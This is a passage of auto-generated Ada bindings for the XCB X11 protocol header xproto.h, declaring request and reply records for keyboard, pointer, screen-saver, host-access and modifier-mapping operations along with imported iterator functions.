bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:4323 length : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:4324 pad0 : aliased xcb_list_extensions_reply_t_array2717; -- /usr/include/xcb/xproto.h:4325 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:4320 --* Opcode for xcb_change_keyboard_mapping. --* -- * @brief xcb_change_keyboard_mapping_request_t -- * type xcb_change_keyboard_mapping_request_t_array1823 is array (0 .. 1) of aliased bits_stdint_uintn_h.uint8_t; type xcb_change_keyboard_mapping_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:4335 keycode_count : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:4336 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:4337 first_keycode : aliased xcb_keycode_t; -- /usr/include/xcb/xproto.h:4338 keysyms_per_keycode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:4339 pad0 : aliased xcb_change_keyboard_mapping_request_t_array1823; -- /usr/include/xcb/xproto.h:4340 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:4334 --* -- * @brief xcb_get_keyboard_mapping_cookie_t -- * type xcb_get_keyboard_mapping_cookie_t is record sequence : aliased unsigned; -- /usr/include/xcb/xproto.h:4347 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:4346 --* Opcode for xcb_get_keyboard_mapping. --* -- * @brief xcb_get_keyboard_mapping_request_t -- * type xcb_get_keyboard_mapping_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:4357 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:4358 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:4359 first_keycode : aliased xcb_keycode_t; -- /usr/include/xcb/xproto.h:4360 count : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:4361 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:4356 --* -- * @brief xcb_get_keyboard_mapping_reply_t -- * type xcb_get_keyboard_mapping_reply_t_array2717 is array (0 .. 23) of aliased bits_stdint_uintn_h.uint8_t; type xcb_get_keyboard_mapping_reply_t is record response_type : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:4368 keysyms_per_keycode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:4369 sequence : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:4370 length : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:4371 pad0 : aliased xcb_get_keyboard_mapping_reply_t_array2717; -- /usr/include/xcb/xproto.h:4372 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:4367 subtype xcb_kb_t is unsigned; XCB_KB_KEY_CLICK_PERCENT : constant unsigned := 1; XCB_KB_BELL_PERCENT : constant unsigned := 2; XCB_KB_BELL_PITCH : constant unsigned := 4; XCB_KB_BELL_DURATION : constant unsigned := 8; XCB_KB_LED : constant unsigned := 16; XCB_KB_LED_MODE : constant unsigned := 32; XCB_KB_KEY : constant unsigned := 64; XCB_KB_AUTO_REPEAT_MODE : constant unsigned := 128; -- /usr/include/xcb/xproto.h:4375 type xcb_led_mode_t is (XCB_LED_MODE_OFF, XCB_LED_MODE_ON) with Convention => C; -- /usr/include/xcb/xproto.h:4386 type xcb_auto_repeat_mode_t is (XCB_AUTO_REPEAT_MODE_OFF, XCB_AUTO_REPEAT_MODE_ON, XCB_AUTO_REPEAT_MODE_DEFAULT) with Convention => C; -- /usr/include/xcb/xproto.h:4391 --* -- * @brief xcb_change_keyboard_control_value_list_t -- * type xcb_change_keyboard_control_value_list_t is record key_click_percent : aliased bits_stdint_intn_h.int32_t; -- /usr/include/xcb/xproto.h:4401 bell_percent : aliased bits_stdint_intn_h.int32_t; -- /usr/include/xcb/xproto.h:4402 bell_pitch : aliased bits_stdint_intn_h.int32_t; -- /usr/include/xcb/xproto.h:4403 bell_duration : aliased bits_stdint_intn_h.int32_t; -- /usr/include/xcb/xproto.h:4404 led : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:4405 led_mode : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:4406 key : aliased xcb_keycode32_t; -- /usr/include/xcb/xproto.h:4407 auto_repeat_mode : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:4408 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:4400 --* Opcode for xcb_change_keyboard_control. --* -- * @brief xcb_change_keyboard_control_request_t -- * type xcb_change_keyboard_control_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:4418 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:4419 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:4420 value_mask : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:4421 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:4417 --* -- * @brief xcb_get_keyboard_control_cookie_t -- * type xcb_get_keyboard_control_cookie_t is record sequence : aliased unsigned; -- /usr/include/xcb/xproto.h:4428 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:4427 --* Opcode for xcb_get_keyboard_control. --* -- * @brief xcb_get_keyboard_control_request_t -- * type xcb_get_keyboard_control_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:4438 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:4439 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:4440 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:4437 --* -- * @brief xcb_get_keyboard_control_reply_t -- * type xcb_get_keyboard_control_reply_t_array1823 is array (0 .. 1) of aliased bits_stdint_uintn_h.uint8_t; type xcb_get_keyboard_control_reply_t_array2340 is array (0 .. 31) of aliased bits_stdint_uintn_h.uint8_t; type xcb_get_keyboard_control_reply_t is record response_type : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:4447 global_auto_repeat : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:4448 sequence : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:4449 length : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:4450 led_mask : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:4451 key_click_percent : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:4452 bell_percent : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:4453 bell_pitch : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:4454 bell_duration : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:4455 pad0 : aliased xcb_get_keyboard_control_reply_t_array1823; -- /usr/include/xcb/xproto.h:4456 auto_repeats : aliased xcb_get_keyboard_control_reply_t_array2340; -- /usr/include/xcb/xproto.h:4457 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:4446 --* Opcode for xcb_bell. --* -- * @brief xcb_bell_request_t -- * type xcb_bell_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:4467 percent : aliased bits_stdint_intn_h.int8_t; -- /usr/include/xcb/xproto.h:4468 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:4469 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:4466 --* Opcode for xcb_change_pointer_control. --* -- * @brief xcb_change_pointer_control_request_t -- * type xcb_change_pointer_control_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:4479 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:4480 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:4481 acceleration_numerator : aliased bits_stdint_intn_h.int16_t; -- /usr/include/xcb/xproto.h:4482 acceleration_denominator : aliased bits_stdint_intn_h.int16_t; -- /usr/include/xcb/xproto.h:4483 threshold : aliased bits_stdint_intn_h.int16_t; -- /usr/include/xcb/xproto.h:4484 do_acceleration : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:4485 do_threshold : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:4486 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:4478 --* -- * @brief xcb_get_pointer_control_cookie_t -- * type xcb_get_pointer_control_cookie_t is record sequence : aliased unsigned; -- /usr/include/xcb/xproto.h:4493 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:4492 --* Opcode for xcb_get_pointer_control. --* -- * @brief xcb_get_pointer_control_request_t -- * type xcb_get_pointer_control_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:4503 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:4504 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:4505 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:4502 --* -- * @brief xcb_get_pointer_control_reply_t -- * type xcb_get_pointer_control_reply_t_array2771 is array (0 .. 17) of aliased bits_stdint_uintn_h.uint8_t; type xcb_get_pointer_control_reply_t is record response_type : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:4512 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:4513 sequence : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:4514 length : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:4515 acceleration_numerator : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:4516 acceleration_denominator : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:4517 threshold : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:4518 pad1 : aliased xcb_get_pointer_control_reply_t_array2771; -- /usr/include/xcb/xproto.h:4519 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:4511 type xcb_blanking_t is (XCB_BLANKING_NOT_PREFERRED, XCB_BLANKING_PREFERRED, XCB_BLANKING_DEFAULT) with Convention => C; -- /usr/include/xcb/xproto.h:4522 type xcb_exposures_t is (XCB_EXPOSURES_NOT_ALLOWED, XCB_EXPOSURES_ALLOWED, XCB_EXPOSURES_DEFAULT) with Convention => C; -- /usr/include/xcb/xproto.h:4528 --* Opcode for xcb_set_screen_saver. --* -- * @brief xcb_set_screen_saver_request_t -- * type xcb_set_screen_saver_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:4541 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:4542 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:4543 timeout : aliased bits_stdint_intn_h.int16_t; -- /usr/include/xcb/xproto.h:4544 interval : aliased bits_stdint_intn_h.int16_t; -- /usr/include/xcb/xproto.h:4545 prefer_blanking : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:4546 allow_exposures : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:4547 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:4540 --* -- * @brief xcb_get_screen_saver_cookie_t -- * type xcb_get_screen_saver_cookie_t is record sequence : aliased unsigned; -- /usr/include/xcb/xproto.h:4554 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:4553 --* Opcode for xcb_get_screen_saver. --* -- * @brief xcb_get_screen_saver_request_t -- * type xcb_get_screen_saver_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:4564 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:4565 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:4566 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:4563 --* -- * @brief xcb_get_screen_saver_reply_t -- * type xcb_get_screen_saver_reply_t_array2771 is array (0 .. 17) of aliased bits_stdint_uintn_h.uint8_t; type xcb_get_screen_saver_reply_t is record response_type : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:4573 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:4574 sequence : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:4575 length : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:4576 timeout : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:4577 interval : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:4578 prefer_blanking : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:4579 allow_exposures : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:4580 pad1 : aliased xcb_get_screen_saver_reply_t_array2771; -- /usr/include/xcb/xproto.h:4581 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:4572 type xcb_host_mode_t is (XCB_HOST_MODE_INSERT, XCB_HOST_MODE_DELETE) with Convention => C; -- /usr/include/xcb/xproto.h:4584 subtype xcb_family_t is unsigned; XCB_FAMILY_INTERNET : constant unsigned := 0; XCB_FAMILY_DECNET : constant unsigned := 1; XCB_FAMILY_CHAOS : constant unsigned := 2; XCB_FAMILY_SERVER_INTERPRETED : constant unsigned := 5; XCB_FAMILY_INTERNET_6 : constant unsigned := 6; -- /usr/include/xcb/xproto.h:4589 --* Opcode for xcb_change_hosts. --* -- * @brief xcb_change_hosts_request_t -- * type xcb_change_hosts_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:4604 mode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:4605 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:4606 family : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:4607 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:4608 address_len : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:4609 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:4603 --* -- * @brief xcb_host_t -- * type xcb_host_t is record family : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:4616 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:4617 address_len : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:4618 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:4615 --* -- * @brief xcb_host_iterator_t -- * type xcb_host_iterator_t is record data : access xcb_host_t; -- /usr/include/xcb/xproto.h:4625 c_rem : aliased int; -- /usr/include/xcb/xproto.h:4626 index : aliased int; -- /usr/include/xcb/xproto.h:4627 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:4624 --* -- * @brief xcb_list_hosts_cookie_t -- * type xcb_list_hosts_cookie_t is record sequence : aliased unsigned; -- /usr/include/xcb/xproto.h:4634 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:4633 --* Opcode for xcb_list_hosts. --* -- * @brief xcb_list_hosts_request_t -- * type xcb_list_hosts_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:4644 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:4645 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:4646 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:4643 --* -- * @brief xcb_list_hosts_reply_t -- * type xcb_list_hosts_reply_t_array2015 is array (0 .. 21) of aliased bits_stdint_uintn_h.uint8_t; type xcb_list_hosts_reply_t is record response_type : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:4653 mode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:4654 sequence : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:4655 length : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:4656 hosts_len : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:4657 pad0 : aliased xcb_list_hosts_reply_t_array2015; -- /usr/include/xcb/xproto.h:4658 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:4652 type xcb_access_control_t is (XCB_ACCESS_CONTROL_DISABLE, XCB_ACCESS_CONTROL_ENABLE) with Convention => C; -- /usr/include/xcb/xproto.h:4661 --* Opcode for xcb_set_access_control. --* -- * @brief xcb_set_access_control_request_t -- * type xcb_set_access_control_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:4673 mode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:4674 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:4675 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:4672 type xcb_close_down_t is (XCB_CLOSE_DOWN_DESTROY_ALL, XCB_CLOSE_DOWN_RETAIN_PERMANENT, XCB_CLOSE_DOWN_RETAIN_TEMPORARY) with Convention => C; -- /usr/include/xcb/xproto.h:4678 --* Opcode for xcb_set_close_down_mode. --* -- * @brief xcb_set_close_down_mode_request_t -- * type xcb_set_close_down_mode_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:4691 mode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:4692 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:4693 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:4690 type xcb_kill_t is (XCB_KILL_ALL_TEMPORARY) with Convention => C; -- /usr/include/xcb/xproto.h:4696 --* Opcode for xcb_kill_client. --* -- * @brief xcb_kill_client_request_t -- * type xcb_kill_client_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:4707 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:4708 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:4709 resource : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:4710 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:4706 --* Opcode for xcb_rotate_properties. --* -- * @brief xcb_rotate_properties_request_t -- * type xcb_rotate_properties_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:4720 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:4721 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:4722 window : aliased xcb_window_t; -- /usr/include/xcb/xproto.h:4723 atoms_len : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:4724 c_delta : aliased bits_stdint_intn_h.int16_t; -- /usr/include/xcb/xproto.h:4725 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:4719 type xcb_screen_saver_t is (XCB_SCREEN_SAVER_RESET, XCB_SCREEN_SAVER_ACTIVE) with Convention => C; -- /usr/include/xcb/xproto.h:4728 --* Opcode for xcb_force_screen_saver. --* -- * @brief xcb_force_screen_saver_request_t -- * type xcb_force_screen_saver_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:4740 mode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:4741 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:4742 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:4739 type xcb_mapping_status_t is (XCB_MAPPING_STATUS_SUCCESS, XCB_MAPPING_STATUS_BUSY, XCB_MAPPING_STATUS_FAILURE) with Convention => C; -- /usr/include/xcb/xproto.h:4745 --* -- * @brief xcb_set_pointer_mapping_cookie_t -- * type xcb_set_pointer_mapping_cookie_t is record sequence : aliased unsigned; -- /usr/include/xcb/xproto.h:4755 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:4754 --* Opcode for xcb_set_pointer_mapping. --* -- * @brief xcb_set_pointer_mapping_request_t -- * type xcb_set_pointer_mapping_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:4765 map_len : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:4766 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:4767 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:4764 --* -- * @brief xcb_set_pointer_mapping_reply_t -- * type xcb_set_pointer_mapping_reply_t is record response_type : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:4774 status : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:4775 sequence : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:4776 length : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:4777 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:4773 --* -- * @brief xcb_get_pointer_mapping_cookie_t -- * type xcb_get_pointer_mapping_cookie_t is record sequence : aliased unsigned; -- /usr/include/xcb/xproto.h:4784 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:4783 --* Opcode for xcb_get_pointer_mapping. --* -- * @brief xcb_get_pointer_mapping_request_t -- * type xcb_get_pointer_mapping_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:4794 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:4795 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:4796 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:4793 --* -- * @brief xcb_get_pointer_mapping_reply_t -- * type xcb_get_pointer_mapping_reply_t_array2717 is array (0 .. 23) of aliased bits_stdint_uintn_h.uint8_t; type xcb_get_pointer_mapping_reply_t is record response_type : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:4803 map_len : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:4804 sequence : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:4805 length : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:4806 pad0 : aliased xcb_get_pointer_mapping_reply_t_array2717; -- /usr/include/xcb/xproto.h:4807 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:4802 type xcb_map_index_t is (XCB_MAP_INDEX_SHIFT, XCB_MAP_INDEX_LOCK, XCB_MAP_INDEX_CONTROL, XCB_MAP_INDEX_1, XCB_MAP_INDEX_2, XCB_MAP_INDEX_3, XCB_MAP_INDEX_4, XCB_MAP_INDEX_5) with Convention => C; -- /usr/include/xcb/xproto.h:4810 --* -- * @brief xcb_set_modifier_mapping_cookie_t -- * type xcb_set_modifier_mapping_cookie_t is record sequence : aliased unsigned; -- /usr/include/xcb/xproto.h:4825 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:4824 --* Opcode for xcb_set_modifier_mapping. --* -- * @brief xcb_set_modifier_mapping_request_t -- * type xcb_set_modifier_mapping_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:4835 keycodes_per_modifier : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:4836 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:4837 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:4834 --* -- * @brief xcb_set_modifier_mapping_reply_t -- * type xcb_set_modifier_mapping_reply_t is record response_type : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:4844 status : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:4845 sequence : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:4846 length : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:4847 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:4843 --* -- * @brief xcb_get_modifier_mapping_cookie_t -- * type xcb_get_modifier_mapping_cookie_t is record sequence : aliased unsigned; -- /usr/include/xcb/xproto.h:4854 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:4853 --* Opcode for xcb_get_modifier_mapping. --* -- * @brief xcb_get_modifier_mapping_request_t -- * type xcb_get_modifier_mapping_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:4864 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:4865 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:4866 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:4863 --* -- * @brief xcb_get_modifier_mapping_reply_t -- * type xcb_get_modifier_mapping_reply_t_array2717 is array (0 .. 23) of aliased bits_stdint_uintn_h.uint8_t; type xcb_get_modifier_mapping_reply_t is record response_type : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:4873 keycodes_per_modifier : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:4874 sequence : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:4875 length : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:4876 pad0 : aliased xcb_get_modifier_mapping_reply_t_array2717; -- /usr/include/xcb/xproto.h:4877 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:4872 --* Opcode for xcb_no_operation. --* -- * @brief xcb_no_operation_request_t -- * type xcb_no_operation_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:4887 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:4888 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:4889 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:4886 --* -- * Get the next element of the iterator -- * @param i Pointer to a xcb_char2b_iterator_t -- * -- * Get the next element in the iterator. The member rem is -- * decreased by one. The member data points to the next -- * element. The member index is increased by sizeof(xcb_char2b_t) -- procedure xcb_char2b_next (i : access xcb_char2b_iterator_t) -- /usr/include/xcb/xproto.h:4901 with Import => True, Convention => C, External_Name => "xcb_char2b_next"; --* -- * Return the iterator pointing to the last element -- * @param i An xcb_char2b_iterator_t -- * @return The iterator pointing to the last element -- * -- * Set the current element in the iterator to the last element. -- * The member rem is set to 0. The member data points to the -- * last element. -- function xcb_char2b_end (i : xcb_char2b_iterator_t) return xcb.xcb_generic_iterator_t -- /usr/include/xcb/xproto.h:4913 with Import => True, Convention => C, External_Name => "xcb_char2b_end"; --* -- * Get the next element of the iterator -- * @param i Pointer to a xcb_window_iterator_t -- * -- * Get the next element in the iterator. The member rem is -- * decreased by one. The member data points to the next -- * element. The member index is increased by sizeof(xcb_window_t) -- procedure xcb_window_next (i : access xcb_window_iterator_t) -- /usr/include/xcb/xproto.h:4924 with Import => True, Convention => C, External_Name => "xcb_window_next"; --* -- * Return the iterator pointing to the last element -- * @param i An xcb_window_iterator_t -- * @return The iterator pointing to the last element -- * -- * Set the current element in the iterator to the last element. -- * The member rem is set to 0. The member data points to the -- * last element. -- function xcb_window_end (i : xcb_window_iterator_t) return xcb.xcb_generic_iterator_t -- /usr/include/xcb/xproto.h:4936 with Import => True, Convention => C, External_Name => "xcb_window_end"; --* -- * Get the next element of the iterator -- * @param i Pointer to a xcb_pixmap_iterator_t -- * -- * Get the next element in the iterator. The member rem is -- * decreased by one. The member data points to the next -- * element. The member index is increased by sizeof(xcb_pixmap_t) -- procedure xcb_pixmap_next (i : access xcb_pixmap_iterator_t) -- /usr/include/xcb/xproto.h:4947 with Import => True, Convention => C, External_Name => "xcb_pixmap_next"; --* -- * Return the iterator pointing to the last element -- * @param i An xcb_pixmap_iterator_t -- * @return The iterator pointing to the last element -- * -- * Set the current element in the iterator to the last element. -- * The member rem is set to 0. The member data points to the -- * last element. -- function xcb_pixmap_end (i : xcb_pixmap_iterator_t) return xcb.xcb_generic_iterator_t -- /usr/include/xcb/xproto.h:4959 with Import => True, Convention => C, External_Name => "xcb_pixmap_end"; --* -- * Get the next element of the iterator -- * @param i Pointer to a 